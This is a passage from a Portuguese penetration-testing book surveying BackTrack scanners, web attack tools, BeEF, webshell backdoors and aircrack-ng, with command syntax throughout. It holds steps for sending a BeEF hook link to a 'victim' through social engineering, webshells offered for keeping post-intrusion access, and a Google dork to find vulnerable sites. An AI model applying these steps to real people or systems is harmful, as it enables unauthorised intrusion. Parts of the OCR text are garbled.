netifera O Netifera é um scaner de portas e serviços um pouco diferente e desconhecido para o público em geral. Ele pode ser usado em qualquer distribuição Linux conhecida, mais não é só um scanner, ele serve também como sniffer. Digite na console ./netifera de dentro de seu diretório e desfrute-o. ww w. cl ub ed oh ack er .c om .b r

3 82


Como ele carrega uma interface gráfica, fica tudo intuitivo, muito fácil de usar mesmo.

Protocolo SCTP O protocolo SCTP é um protocolo de transporte confiável que opera sobre um serviço de pacotes não confiável e sem conexão, da mesma forma que o IP. O SCTP oferece a transferência de datagramas livre de erros e de duplicações através do reconhecimento de transmissões (ACKs).


3 83


A detecção de erros, perda e duplicação de dados é obtida através de bons mecanismos de checksum e números sequenciais. Um mecanismo de retransmissão seletiva é usado para corrigir a perda ou a corrupção de dados.

Aplicabilidade: O SCTP foi projetado como um protocolo de transporte de uso geral para aplicações orientadas a mensagens. A definição desse protocolo foi feita pelo grupo de trabalho SIGTRAN http://datatracker.ietf.org/wg/sigtran/charter/) do IETF, que culminou na emissão de um documento de padronização do SCTP "RFC2960" Disponível em: http://www.ietf.org/rfc/rfc2960.txt. O projeto desse protocolo incluiu a prevenção de congestionamento e a resistência a ataques do tipo flooding. Uma das grandes motivações para o desenvolvimento do SCTP foi as limitações do TCP para transportar sinalização PSTN sobre redes IP. Após atualização a RFC2960 passou a ser chamada por "RFC3309" e está disponível em: http://www.ietf.org/rfc/rfc3309.txt. A partir dessa atualização o mecanismo de checksum do tipo Adler-32 foi substituído por um CRC-32c. já que o Adler-32 não era eficiente o bastante para as novas exigências.


3 84


Em setembro de 2007 foi publicada uma outra RFC, a RFC4960, que substituiu as RFC2960 e a RFC3309. Essa nova trouxe várias alterações e está disponível em: http://www.ietf.org/rfc/rfc4460.txt.

Streams TCP e SCTP: Apesar do TCP ter sido bastante usado para a transferência confiável de dados sobre redes IP, um número crescente de aplicações passaram a ser implementadas com seus próprios mecanismos para a transferência confiável de dados sobre o UDP. Entre os grande motivos para isso estão O TCP oferece a transferência confiável de dados e uma ordenação estrita na entrega dos dados. Mais algumas aplicações necessitam apenas da transferência confiável sem ordenação enquanto


3 85


que outras podem usar ordenação parcial. Em ambos os casos, o TCP está sujeito ao bloqueio do tipo head-of-line, o que causa atrasos desnecessários na comunicação. A natureza dos streams TCP pode ser inconveniente, uma vez que as aplicações devem aplicar seus próprios delimitadores de registro. Além disso, as aplicações devem forçar o envio final das mensagens (push) por questões de garantia de entrega e evitar repetições. O TCP só é capaz de transferir um stream por conexão, dessa forma se tiver vários streams para transferir terão que ser feitas várias conexões. Isso dificulta bastante na hora de implementar. Já o SCTP é capaz de transferir múltiplos streams em uma única mensagem. É para finalizar, o TCP é bastante vulnerável a ataques do tipo DoS "denial-of-service". O backtrack traz um scanner especial para teste desse tipo de aplicação:


3 86


O Sctpscan.

Ele está dentro do diretório pentest/scanners/sctpscan root@bt:/pentest/scanners/sctpscan# ./sctpscan Opções: -P, --Port (padrão: 10000) Especifíca o número da porta remota. -P, --loc_port (padrão: 10000) Especifíca o número de porta local. (padrão: 127.0.0.1) Especifíca o host -L, - (bind) local para oloc_host SCTP corrente com número de porta local sendo opcional. -R, --rem_host (padrão: 127.0.0.2) Especifíca o endereço (sendto) remoto para o SCTP corrente com número de porta remoto sendo opcional.


3 87


-S - scan-r aaa [.. Bbb [ccc]] Escanear todas as máquinas dentro da rede. -M --mapa: ((mapear todas as portas de 0 a 65535 SCTP 0-65535) (portscan) -F - Frequent: Ecanneamento das portas usadas com freqüência SCTP. Ex: Portas mais freqüentes SCTP: 1, 7, 9, 20, 21, 22, 80, 100, 128, 179, 260, 250, 443, 1167, 1812, 2097, 2000, 2001, 2010, 2011, 2020, 2021, 2100, 2110, 2120, 2225, 2427, 2477, 2577, 2904, 2905, 2906, 2907, 2908, 2909, 2944, 2945, 3000, 3097, 3565, 3740, 3863, 3864, 3868, 4000, 4739, 4740, 5000, 5001, 5060, 5061, 5090, 5091, 5672, 5675, 6000, 6100, 6110, 6120, 6130, 6140, 6150, 6160, 6170, 6180, 6190, 6529, 6700, 6701, 6702, 6789, 6790, 7000, 7001, 7102, 7103, 7105, 7551, 7626, 7701, 7800, 8000, 8001, 8471, 8787, 9006, 9084, 9899, 9911, 9900, 9901, 9902, 10000, 10001, 11146, 11997, 11998, 11999, 12205, 12235, 13000, 13001, 14000, 14001, 20049, 29118, 29168, 30000, 32905, 32931, 32768 -A - autoportscan: Ecanneamento de portas automaticamente em qualquer host. -I - LineIn: Receber o IP para escanear a partir de stdin. -F - fuzz: Testar toda a pilha de protocolo remoto. -B - bothpackets: Enviar pacotes com fragmento INIT para um, e SHUTDOWN_ACK para o outro. -B - both_checksum: Enviar checksum tanto crc32 novo como e antigo. -C - crc32: Calcular a soma com o novo crc32. -A - Adler32: Calcular soma com o Adler32. -Z - zombie: Não há relatório (Aconselho que você pesquise em laboratório). -D - dummyserver: Inicia um servidor SCTP de amostra na porta 10000. (Você pode então tentar escanear-lo a partir de outra máquina). -E - <script_name> exec: Executa <script_name> Cada vez que uma porta SCTP aberta for encontrada.


3 88


Argumentos para execução de scripts: <script_name> host_ip sctp_port -T - tcpbridge: TCP Pontes de ligação de todos TCP para o SCTP remoto com a porta designada. -S - fluxos: Tentar estabelecer associação SCTP com o para o destino remoto e com o SCTP designado. Alguns exemplos práticos Escaneamento da porta 9999 em 192.168.1.24 . / Sctpscan -l -r 192.168.1.2 192.168.1.24-p 9999 Verificar disponibilidade de SCTP em 172.17.8. * E escanear portas em qualquer host. . / Sctpscan -s -l 172.22.1.96 -r 172.17.8 Verifica portas usadas freqüentemente em 172.17.8. * . / Sctpscan-s-f-l-r 172.22.1.96 172.17.8 Varre toda a rede de classe B para a porta freqüente . / Sctpscan -s -F -r 172,22 -l `ifconfig eth0 | grep" inet addr: "| cut-d:f2 | cut-d ''-f 1` Final de verificação simples para terminar na máquina local: . / Sctpscan-d & . / Sctpscan-s-l-r 192.168.1.24 192.168.1-p 10.000 Observação: Esta ferramenta não funciona corretamente através de NAT. Isso significa que não funcionarar na maioria dos roteadores e firewall. Você deve usar esta ferramenta a partir de um computador que tenha um endereço IP público. " Leia RFC1918"


3 89


testssl.sh O testssl.sh é uma ferramenta de linha de comando Unix e ja vem no backtrar, ela é útil pra testar falhas em SSL na versão SSL 2. Projetado para ser de facil utilização, ele trabalha sobre uma shell em qualquer distribuição Linux que tenha openssl instalado.

#./testssl.sh


3 90


#./testssl.sh -a www.adonelbezerra.com.br Aqui estou fazendo um teste em um dos meus sites www.adonelbezerra.com.br

hexinject O hexinject é um analisador de tráfego de rede parecido com o Wireshark, tcpdump e ou scap.


3 91


Ele pode ser usado para injeção de pacotes e sniffer em linha de comando, o manual é autoexplicativo com muitas dicas.

Comando inicail: #hexinject

Opções para o comando: -s modo farejar. -p modo injetar. -r modo bruto (em vez do modo hexadecimal padrão). -i dispositivo: dispositivo de rede que voce deseja usar. -f filtro: filtro personalizado pcap. -c Número de pacotes para capturar -t tempo de espera em microssegundos (padrão 100)


3 92


Opções de injeção: -C desativar verificação automática de pacotes. -S desativar tamanho do pacote automático.

Opções de interface: -P desativar o modo promíscuo. -M colocar a interface wireless em modo monitor esse metodo ainda é experimental: Por isso eu aconselho que você use o airmon-ng que já está consolidado.

Modo de conversão: -x Converter a entrada hexstring -y Converter a entrada hexstring o produto

Modo de impressão e desmontagem opções: -D Permitem desmontar o pacote na tela. -L Exibe um pacote de exemplo (requer o tipo de pacote: TCP, UDP, ICMP ou ARP)


3 93


Outras opções: -h tela de ajuda

#./hexinject -s eth0 Aqui o comando mais simples de todos para manipulação do hexinject. De acordo com as orientações e descrições dos comandos você saberá utilizar esse sniffer com maestria.

tcpreplay O tcpreplay é uma ferramenta para analise de tráfego de rede em arquivos salvos com o tcpdump ou outras ferramentas que escrevem no mesmo formato pcap.


3 94


Utilização fácil: tcpreplay [- [] | - [{= |} ]] .. Algumas opções de linha de comando. -P, - pid exibir o PID do tcpreplay na inicialização -V, - version para imprimir a versão


3 95


-H, - help informações sobre o uso de exibição e saída

Um exemplo simples de utilização na linha de comandos. root @ bt : /pentest /sniffers / tcpreplay

Diretório web: Dentro do Backtrack você encontrará o diretório web, é nele que se encontram todas as ferramentas disponíveis exclusivamente para testes em aplçicações web e passarei a demonstrar


3 96


o funcionamento de algumas dentre as principais.

Dentro desse diretório tem atualmente algumas dezenas de ferramentas: vamos conhecê-las. Asp-auditor Ideal para se fazer auditoria inicial em sistemas feitos em ASP


3 97


Ele mostra informações como, o caminho do diretório padrão do site, versão do servidor e versão dos serviços em execução. O comando básico é bem simples; ./asp-audit.pl + alvo

DarkmySqli O Darkmysqli é um script feito em python para múltiplos propósitos. Seu objetivo principal é a injeção em bando de dados MYSQL. Esta ferramenta permite a um invasor explorar um erro SQL através de injeção e exploração de aplicações web.


3 98


Antes de utilizá-lo você deve entender que o darkmysqli é uma ferramenta de exploração de vulnerabilidades, ou seja, serve para fazer a prova de conceito "invasão", por isso deve-se a principio encontrar uma vulnerabilidade em uma aplicação web. Para esse propósito existem várias ferramentas disponíveis e nós mostraremos nessa obra. #python ./DarkMySQLi.py - u http://www.site alvo.xom.br/caminho

Você pode aprender mais se utilizar o comando help para conhecer as opções de linha de comando.


3 99


Joomscan O Joomscan é um scanner de vulnerabilidades para o CMS Joomla. Ele detecta inclusão de arquivos e injeção de SQL. Foi desenvolvido em Perl e já esta disponível no backtrack. A utilização é bem simples e pode detectar mais de 600 falhas em CMS Joomla.

#./joomscan.pl + site alvo


4 00


Continuação da saída

Plecost O plecost é uma ferramenta para exploração em sites feitos com o CMS Wordpress, ele recupera informações sobre os plugins instalados e suas versões. Ele pode tambem analisar uma única URL ou realizar análise com base nos resultados indexados pelo Google.


4 01


# python ./plecost_versao_disponível.py

Utilize o comando python ./plecost_versao_disponível.py para aparecer a tela com todas as opções de comando em Shell Sintaxe: ./plecost-0.2.2-9-beta.py [opções [ URL | [-l num] -G]

Opções de busca no Google: -l Limitar númeroGoogle de resultados para cada plugin no google -G:num: modo de pesquisa

opções: -n: Número de plugins para usar (Padrão é usar mais do que 7000) -c: Verifique plugins apenas com CVE associado


4 02


-R Arquivo: Lista de plugins reload, utilizações n-opção para controlar o tamanho -o Arquivo: Arquivo de saída. ("Output.txt" Default) -i Arquivo: Lista de plugins de entrada (O programa deve estar iniciado) -s Tempo: Menor tempo de espera entre duas buscas "Tempo em segundos" (10) M-Tempo: Maior tempo de espera entre duas buscas "Tempo em segundos" (20) -t num: Número de threads. (O padrão é 1) Untidy

#python ./untidy.py + site alvo


4 03


O Untidy é um fuzzer XML de propósito geral, basta uma string XML como entrada. Não existe muita documentação oficial sobre ele, mas o resultando é muito interessante, vale a pena levar pro laboratório e testar todas as suas funcionalidades por umas 20 horas. WebSlayer O WebSlayer é uma ferramenta desenhada para ataques de força bruta em aplicativos Web, ele pode ser usado para encontrar recursos não vinculados, como diretórios, servlets, scripts, arquivos, etc. Faz força bruta em parâmetros GET, POST, Formulários e parâmetros de usuario/senha.


4 04


#./WebSlayer.py

Essa é a tela inicial dentro do diretório e você pode executá-lo com o comando ./WebSlayer.py


4 05


Você pode executa-lo em ataques, como: Predictable Resource Locator, Discovery, injeção (XSS, SQL) força bruta na autenticação e muito mais. Por executar em uma "GUI" você não terá nenhuma dificuldade em fazer suas analises utilizando essa ferraemnta.

Diretório backdoors: No diretório backdoors voce encontrará as ferramentas necessarias para estudar e testar o conceito de portas dos fundos "backdoors" Algumas backdoors já vem instaladas e prontas para uso no backtrack também, uma dessas ferramentas é a webshells.


4 06


Aqui algumas backdoors para serem utilizadas pós invasão. Isso fará com que você mantenha o acesso caso deseje retornar ao alvo.


4 07


Dentro do diretório asp você pode dar um cat em um dos códigos prontos. No caso da tela acima pode-se ver parte do código fonte de uma backdoor para ASP.

DirBuster Você pode descobrir todos os diretórios de um site, apenas com esses arquivos dentro do diretório dirbuster. O DirBuster é uma aplicação feita em Java para descobrir nomes de diretórios e arquivos em um site ou servidor. Para essa tarefa ele usa ataques de força bruta e busca por algum diretório específico.


4 08


O DirBuster traz consigo um total de 09 arquivos com aplicações diferentes, isso o torna muito eficaz na busca dos arquivos e diretórios ocultos.

Para rodar o programa você deve digitar apenas #java -jar DirBuster0.12.jar -u Em target URL você digita a url mais a porta onde o serviço está escutando. Após isso você clica em browser e escolhe um do arquivos existente no diretório para determinar o tipo de analise que você deseja fazer e é só clicar em start para o programa começar a rodar.


4 09


Aqui nessa você já ver coisas acontecendo, o DirBuster já está listando todotela o conteúdo doassite. Essa aplicação oferece muitos recursos como: Multi-threaded com mais de 6 mil solicitações por segundo, Analise de sites em HTTP e HTTPS, Podem ser adicionados, Cabeçalhos personalizados, Suporte a Proxy, Suporte a NTLM auth e muito mais. Vale muito a pena levar essa aplicação para o laboratório e testar todas as suas funcionalidades. OWASP Mantra O Mantra é um navegador Livre e Open Source baseado estrutura de segurança, é uma coleção de ferramentas livres e de código aberto integrados em um navegador web que pode ser muito úteis para


4 10


analistas de segurança, desenvolvedores de aplicações web e profissionais de segurança que podem encontrar nele um grande aliado na analise antes de liberar suas aplicações para ambiente de produção. #./OWASP\ Mantra

O comando para abrir o navegador é bem simples : #./OWASP\ Mantra Muitoflexível, portátil e fácil de usar com uma interface gráfica agradável. Você pode carregá-lo em cartões de memória, pen drives, CD / DVDs.


4 11


Pode ser executado nativamente no Linux, Windows e Mac. Também pode ser instalado em seu sistema em poucos minutos. Com ele você pode analisar brechas de XSS e muito mais.


4 12


O Mantra OWASP é uma estrutura de analise de segurança construído em cima de um navegador e trabalha com todos os navegadores. Esse é um tipo de conjunto que vale a penas você passar umas 50 horas no laboratório para explorar todos as suas funcionalizades. O mais interessante é que pode ser usado tanto para ataques quanto para defesa.


4 13


Basta digitar #./OWASP\ Mantra de dentro do seu diretório e navegar por esse fabuloso mecanismo de estudo. Powerfuzzer Fuzzing é uma técnica automatizada para testes de software e visa prover dados inválidos, inesperados e aleatórios como entradas para programas de computador. A partir dessas entradas, pode-se monitorar o programa, analisando as exceções como erros em tempo de execução etc. Essa técnica é


4 14


bastante utilizada para testar problemas de segurança em sistemas computacionais. O termo fuzzing ou fuzz é srcinário de um projeto apresentado pelo professor Barton Miller da Universidade de Wisconsin em 1988. E foi denominado de programa de confiabilidade de utilitário em sistemas operacionais. Desse projeto surgiu um fuzzer baseado em linha de comando para testar a confiabilidade de programas Unix. O objetivo principal do projeto era bombardear o sistema com dados aleatórios até eles apresentarem um erro em tempo de execução. Existem dois tipos de programas fuzzing: Os baseados em mutação e baseados em geração, que podem ser empregados como testes de caixa branca, cinza e ou preta. Os maiores alvos para este tipo de teste são os formatos de arquivos e protocolos de rede, mais qualquer tipo de entrada, como variáveis de ambiente, conteúdo de banco de dados, memória compartilhada ou trocas entre threads, eventos de teclado e mouse e até mesmo chamadas de API pode servir de alvo.

Trabalhando com o Powerfuzzer


4 15


#./powerfuzzer.py

Para executá-lo basta digitar # ./powerfuzzer.py O Powerfuzzer é um difusor web automatizado e personalizável. Baseia-se no protocolo HTTP e é projetado para ser bastante amigável, ele consegue dar conta do recado com a efieciencia que se espera de um bom fuzzer. O Powerfuzzer é capaz de identificar problemas como: - Cross Site Scripting (XSS) - Injeções (SQL, LDAP e muito mais. Essa maravilha foi projetada para ser modular e expansível.


4 16


Essa é a tela inicial do Powerfuzzer e deve ser carregada logo após o comando ./powerfuzzer em linha de comandos no diretório

#/pentest/web/powerfuzzer/ A partir daqui você vai escolher as configurações de acordo com suas pretenções. Nao ha grandes dificuldades devido sua "GUI" limpa e pouquissimas opções de configuração, apenas proxy, credenciais url alvo etc.


4 17


Configurando um proxy no Powerfuzzer A: defina o alvo e a porta no 192.xxx.xx.xx:2000 no exemplo temos IP e porta do alvo. Se desejar você pode habilitar o suporte a HTTPS, bastando para isso, digitar a URL usando https:// ao invés de http.

A definição de cookies vem disponível como padrão na versão paga do powerfuzzer, já na versão beta você terá que apontar para um arquivo externo.


4 18


Pode-se também instruir o Powerfuzzer para pular a página de logout e tambem excluir alguma url ou mesmo diretorios dentro do alvo. Basta apontar em Excluir URL´s) ou dir ou mesmo uma seção inteira. Bastando para isso você apontar para as url´s corretas que deseja excluir.

W3af O w3af é um framework para auditoria web em background, ele é chamado de, o metasploit para aplicações web. # ./w3af


4 19


O w3af é um scanner de aplicação web de código fonte aberto. Ele vem com muitos plugins que são divididos em auditoria, ataque, exploração, descoberta, evasão, força bruta e outros. O código fonte é muito bem comentado e foi escrito em python. Para utilizar o w3af em linha de comandos é bem simples e no modo grafico mais ainda. Vamos mostrar algumas opções.

# ./w3af > iniciar o w3af. #.python ./w3af_console

w3af >>> help > Chame a ajuda para os comandos de utilização.


4 20


Na tela de ajuda pode-se encontrar todas opções necessárias para se trabalhar em linha de comando. Mas ele trás uma GUI que é muito mais simples de se trabalhar. Basta


4 21


digitar #python ./w3af_gui

Após o comando #python ./w3af_gui precione enter que será carregado o w3af em modo gráfico.


4 22


Checando se tem nova versão.


4 23


Antes de iniciar os testes em aplicações web você deve selecionar o alvo e os plugins necessários de acordo com sua necessidade. Para qualquer aplicação web que você for testar, irá necessitar ao menos de três plugins configurados. Auditoria, descoberta e produção. Tudo muito simples. Depois é só clicar em start e aguardar o resultado final. Uma grande vantagem é que de dentro dele você pode utilizar outro scripts como o nikto por exemplo.


4 24


Você pode acompanhar o andamento em tempo real se desejar, pois ele vai exibindo todas as descobertas que fizer.

Não tenha pressa, pois ao final você terá um excelente relatório de sua auditoria na aplicação web testada.

Grendel scan O Grendel-Scan é uma ferramenta open source para testes de segurança em aplicações web. Elé possui vários módulo de testes automatizados para a detecção de vulnerabilidades comuns de


4 25


aplicativos escritos para Web e irá ajudá-lo em testes de invasão em todas as formas, principalmente manuais. #./grendel.sh


4 26


Para executá-lo basta digitar #./grendel.sh de dentro do diretório

#/pentest/web/grendel-scan

Muito simples de usar, basta adicionar a url e algumas opções básicas. Depois é só escolher os tipos de teses que deseja selecionar e pronto!

Observação: Evite utilizar url´s absolutas.


4 27


Marque os testes que deseja realizar no alvo e inicie os testes, ai é só aguardar o relatório final.

Beef O beef é uma ferramenta ideal para exploração de vulnerabilidades em Browsers. Ele é modular e já existem modulos para varredura de portas, keyloging e roubo de area de transferencia "clipboard" com ele pode-se lançar vírus, cross-site scripting e muito mais. As preocupações com as aplicações web tem almentado a cada dia e nessas preocupações incluem-se os dispositivos móveis. Essa ferramenta irá permitir que um analista de vulnerabilidades possa


4 28


avaliar o nível de segurança real de um ambiente por meio da técnica de ataque do lado do cliente. Ao contrário de outras estruturas de testes de segurança, o beef consegue enxergar muito além do perímetro da rede. Uma das possibilidades dele é a capacidade de se simular um honeypot como um access point por exemplo. O projeto do beef pode ser encontrado, assim como sua documentação em https://github.com/beefproject/beef

#./beef

Ele requer instalação, portanto, de dentro do diretório você deve digitar ruby install antes de utilizá-lo.


4 29



4 30


Em seguida, copie a URL no navegador (Essa é a minha URL baseada no IP da minha máquina virtual) http://192.168.0.20:3000/ui/panel (O nome do usuário e senha é beef)


4 31


Envie o link http:// 192.168.0.20:3000/demos/basic.html para a vítima através de chat ou e-mail ou qualquer técnica de engenharia social


4 32


O painel de controle do beef é dividido e é composto de três partes básicas:


4 33



4 34


BurpSuite O Burp Suite é uma plataforma integrada para a realização de testes de segurança de aplicações web. Suas várias ferramentas funcionam perfeitamente em conjunto para apoiar o processo de um teste inteiro, desde o mapeamento inicial e análise de superfície de um aplicativo, até encontrar e explorar vulnerabilidades de segurança. Ele é muito fácil de usar e é intuitivo, permitindo que usuários novatos possa utilizá-lo com facilidade. Também é configurável e contém vários recursos para auxiliá-lo nos testes. Para inciciá-lo você digita apenas #java -jar burpsuite_vx.x.xx, o "V" e o "X" aqui refere-se a versão.


4 35


O Burp lhe permite total controle e você pode combinar técnicas avançadas, para tornar seu trabalho mais rápido e agradável.

Como pode-se observar, ele contém vários componentes-chave: Como um proxy que irá interceptar e permitir a você inspecionar, bem como modificar o tráfego entre o navegador e o aplicativo de destino.


4 36


Um scanner web de aplicação avançada para automatizar a detecção de vários tipos de vulnerabilidade. Uma ferramenta de intrusão para realizar vários ataques personalizados para encontrar e explorar vulnerabilidades incomuns. Uma ferramenta para manipular e reenviar solicitações individuais. Uma ferramenta para testar a aleatoriedade de tokens de sessão com capacidade de salvar parte de um trabalho e continuar trabalhando posteriormente. Sua capacidade de expansão permite que você escreva seus próprios plugins para executar tarefas complexas e personalizada, esse burp é algo que vale muito a pena levar pro laboratório e passar


4 37


umas 18 horas explorando todas as suas potencialidades.

Blindelephant O BlindElephant é uma ferramenta para fingerprinter, seu objetivo é tentar descobrir a versão de um aplicativo web traçando comparativos entre arquivos estáticos em locais conhecidos contra hashes pré-computadas para as versões desses arquivos em todas as versões disponíveis. A técnica é rápida e usa pouca largura de banda. Não é invasivo e é altamente customizável. A documentação completa pode ser encontrada na página web do projeto em: https://sourceforge.net/projects/blindelephant/ Sua instalação é muito simples: #python setup.py install


4 38


O BlindElephant pode ser utilizado diretamente pela shell ou como uma biblioteca para fornecer funcionalidade de fingerprinting para outros programas.

Fimap O Fimap é uma ferramenta desenvolvida em python e pode encontrar, preparar, examinar e explorar o Google automaticamente em busca de erros de arquivos locais e remotos.

#python fimap.py -g -q inurl:noticias.php?id=

#python fimap.py -g -q inurl:noticias.php?id= ww w. cl ub ed oh ack er .c om .b r

4 39


O objetivo dele é melhorar a qualidade e a segurança de um determinado site e é muito útil para uma pesquisa especifica.

Dradis Framework Mesmo nos dias de hoje onde presenciamos a grande evolução dos sistemas Linux, ainda temos algumas dificuldades em centralizar relatórios e tratá-lo s de forma colaborativa. Na maioria dos casos uma equipe de analistas necessitam centralizar as informações colhidas de determinado projeto em execução em algum repositório para que a equipe inteira possa acompanhar e cada um dos seus membros possam dar sua contribuição. É aqui que entra o Dradis um excelente framework para centralização de todos os projetos. O projeto do Framework Dradis pode ser acessado através da url http://dradisframework.org/. Comunicando sobre o SSL, é possível importar arquivos de resultado do Nmap e Nessus, anexar arquivos, gerar relatórios, e pode ser estendido para conectar-se com sistemas externos: Por exemplo, banco de dados de vulnerabilidade etc.


4 40


No BackTrack ele já vem instalado, mais se você utiliza outra distribuição ou deseja instalar você pode fazer isso com o comando;

#apt-get install dradis Uma vez que o framework foi instalado você pode ir para o diretório e iniciar o servidor. # cd /pentest/misc/dradis/server #ruby ./script/server Agora é só abrir a interface web do Dradis.

HTTPS://localhost:3004 (Ou use o endereço de IP), aceite o aviso de certificado, digite uma senha para o novo servidor, quando solicitado e faça o login usando a senha definida na etapa anterior. Note que não há nomes para definir a forma de login, você pode usar qualquer nome de login. Se tudo correr bem, você será direcionado a uma interface dradis em sua área de trabalho.


4 41


No lado esquerdo, você pode criar uma estrutura de árvore. Assim você pode organizar as informações como; (por exemplo: hosts, sub-redes, serviços, etc.) No lado direito você pode adicionar as informações relevantes para cada elemento (notas, anexos etc.). Antes de iniciar o console do Dradis, você precisará editar o arquivo “dradis.xml” para refletir o nome de usuário e senha quando

você definir inicialmente no funcionamento do servidor. Obs: Na versão 5 do backtrak o dradis já vem instalado, portanto, pode haver algumas mudanças pois esse é um projeto em franca


4 42


evolução. Para quem usa ainda o BackTrack4, o arquivo pode ser encontrado em: /pentest/misc/dradis/client/conf. Carregue o console do Dradis com o comando

/pentest/misc/dradis/client/. ruby ./dradis.rb de dentro do diretório Para mais informações sobre o Framework Dradis, você pode visitar o site do projeto no endereço http://dradisframework.org/. Embora já tenhamos instalado e configurado o Dradis para armazenar as informações e resultados, é sempre bom criar um novo banco de dados usando o Metasploit para que os dados possam ser recuperados de forma rápida em caso de necessidades em determinados cenários de ataque.

msf> db_create msf> load db_tracker msf> help Pode-se usar o comando 'db_nmap' para executar uma varredura do Nmap contra os alvos e ter os resultados da verificação armazenada no banco de dados recém-criado, no entanto, o Metasploit só irá criar o arquivo de saída XML que é o formato que ele usa para preencher os dados enquanto que o Dradis pode importar a saída para o grep ou normal.


4 43


É sempre bom ter todas as três saídas do Nmap (XML, grep, e normal). Experimente executar o Scan Nmap usando as flags “ -oA” para

gerar a saída dos três arquivos e em seguida, execute o comando “db_import_nmap_xml” para alimentar o banco de dados do

Metasploit. Se você não quiser importar os seus resultados para o Dradis, basta executar o Nmap usando “db_nmap” com as opções que

você usaria normalmente, omitindo a flag de saída. O exemplo a seguir seria, então; “db_nmap –v -sV 192.168.1.0/24”. msf> nmap –v –sV 192.168.1.0/24 –oA subnet_1; Com a varredura terminada, pode-se usar o comando “db_import_nmap_xml” para importar o arquivo XML do Nmap. msf>db_import_nmap_xml

subnet_1.xml Após isso é só importar os resultados para o Dradis; dradis>

import nmap /pentest/exploits/framework/subnet_1.nmap normal e atualizar o navegador para que os dados possam ser exibidos.


4 44


Ataque a redes wireless


4 45


As Redes sem fio ou wireless (WLANs) surgiram da mesma forma que muitas outras tecnologias; no meio militar. Havia a necessidade de implementação de um método simples e seguro para troca de informações em ambiente de combate. O tempo passou e a tecnologia evoluiu, deixando de ser restrita ao meio militar e se tornou acessível a empresas, faculdades e ao usuário doméstico. Nos dias de hoje podemos pensar em redes wireless como uma alternativa bastante interessante em relação as redes cabeadas, embora ainda com custo elevado. Suas aplicações são muitas e variadas e o fato de ter a mobilidade como principal característica, tem facilitado sua aceitação, principalmente nas empresas. A evolução dos padrões oferecendo taxas de transmissão comparáveis a Fast Ethernet por exemplo, torna as redes wireless uma realidade cada vez mais presente. WLANs usam ondas de radio para transmissão de dados. Comumente podem transmitir na faixa de freqüência 2.4 Ghz (Não licenciada) ou 5 Ghz.


4 46


Padrões wifi Como WLANs usam o mesmo método de transmissão das ondas de radio AM/FM, as leis que as regem são as mesmas destes. O FCC (Federal Comunications Comission), regula o uso dos dispositivos WLAN. O IEEE ( Institute of Eletrical and Eletronic Engineers) é responsável pela criação e adoção dos padrões operacionais. Você pode estudar sobre esses padrões no site do IEEE em: http://www.ieee802.org/ pois o nosso foco aqui é a analise de vulnerabilidades.


4 47


Autenticação e autorização Para se conectar a uma rede, é necessário autenticar e associar o cliente; O IEEE 802.11 descreve o método de descoberta de redes por varredura ativa; Informações adicionais e documentação completa podem ser obtidas através do site: http://www.ieee.org/ 1) Inicialmente tem-se quadros “Probe Request” que faz uma varredura em todos os canais possíveis, em busca de redes disponíveis. 2) O Quadro “Probe Response” é a resposta do ponto de acesso a os

quadros probe request com os parâmetros necessários para conexão; Identificando o SSID, o canal e a taxa de transmissão de dados disponível o cliente obtém então, a lista de redes disponíveis. 3) Cliente inicia o processo de autenticação com uma das redes disponíveis; Redes abertas não requerem autenticação e o ponto de acesso inicia automaticamente o processo, já as redes fechadas requerem autenticação entre o cliente e o ponto de acesso que irá autenticar o cliente utilizando algum método, seja (WEP/WPA-PSK , EAP etc.); 4) Após a autenticação termina o processo de associação e uma vez associado já pode haver a troca de dados via rede Wireless;


4 48


O processo acima é o ideal, o grande problema é que a placa de rede pode trabalhar em modos de operação variados. Com o modo Cliente, que configura a interface para atuar como cliente, nesse modo não é possível mudar de canal e deve enviar solicitações “probe requests” para identificar redes existentes, isso

significa que se você desejar rodar um sniffer, só conseguirá coletar pacotes 802.3 padrão ethernet, ou seja, você já deve estar associado e colocar a placa em modo promiscuo.

Modo Monitor Modo Monitor, também chamado de modo de monitoramento, permite que um computador com uma placa com interface de rede sem fio realize o monitoramento de todo o tráfego recebido da rede


4 49


wireless. Esse modo é bem diferente do modo promíscuo, que é utilizado para sniffar o trafego em rede, o modo monitor lhe permite capturar pacotes sem a necessidade de o cliente estar associado ao ponto de acesso. Uma outra distinção entre o modo promiscuo e monitor é que o segundo atua com eficiência apenas nas redes wireless, enquanto o primeiro pode ser usado em redes cabeadas. Aqui que entra a fase mais interessante, pois pode-se utilizar o modo monitor para se fazer analise de vulnerabilidade e para outros propositos "maliciosos" como coletar tráfego de um vizinho para roubar internet sem sua permissão, pois ele opera diretamente na camada física, acessa frames de gerenciamento e controle do 802.11 e se reconhecer a chave, é possível decifrar a informação contida nos pacotes capturados em todos os canais utilizados “channel hopping”;

Ferramentas para auditoria em Wireless Para se fazer uma boa auditoria em redes wireless precisamos dominar o conjunto de ferramentas air+-ng, todas disponíveis no Backtrack e no Kali Linux e que chamamos de suíte de utilitário air*-ng, composta de


4 50


diversos softwares para detecção e ataques à Access Points e clientes wi-fi. Os principais são:

Airmon-ng – Serve para colocar a placa de rede em modo monitoração. Essencial para poder capturar o tráfego das redes wi-fi sem estar conectado nas mesmas.

Airodump-ng – Monitora o espectro wi-fi e captura pacotes para um arquivo especificado pelo usuário.


4 51


Exemplo prático: Sintaxe: airodump-ng Opções: --channel canal -> Especifica o canal de operação w arquivo -> Salva os pacotes capturados em um arquivo. Mesmo que a opção –write. --encrypt tipo -> Filtra APs por tipo de criptografia


4 52


--bssid MAC -> Filtra APs pelo BSSID do AP -a Filtra clientes desassociados -> Especifica o canal de operação Utilizando o comando --help no airodump-ng serão mostradas na saída padrão todas as opções disponível para sua utilização. Vamos descrever essas opções aqui, mais você pode encontrar informações detalhadas no site: http://www.aircrack-ng.org

usage: airodump-ng [,,...] Options: = Opções --ivs : Save only captured IVs = Salvar somente IVs capturados

--gpsd : Use GPSd = Opção para uso de GPSd --write

: Dump file prefix = Prefixo do arquivo

dump

-w : same as --write = A mesma coisa que --write --beacons : Record all beacons in dump file = Gravar todos os beacons em um arquivo dump


4 53


--update : Display update delay in seconds = Mostrar o atraso de atualização

--showack : Prints ack/cts/rts statistics = Mostrar as estatísticas

-h : Hides known stations for --showack = Esconder as estações conhecidas pelo --showack

-f : Time in ms between hopping channels = Tempo entre canais "alternando"

--berlin : Time before removing the AP/client = Tempo antes da remoção do Access Point cliente por inatividade no recebimento de pacotes, o padrão é 120 -r : Read packets from that file = Leitura de pacotes de um arquivo especificado

-x : Active Scanning Simulation = Simulação de um scanner de exploração ativa

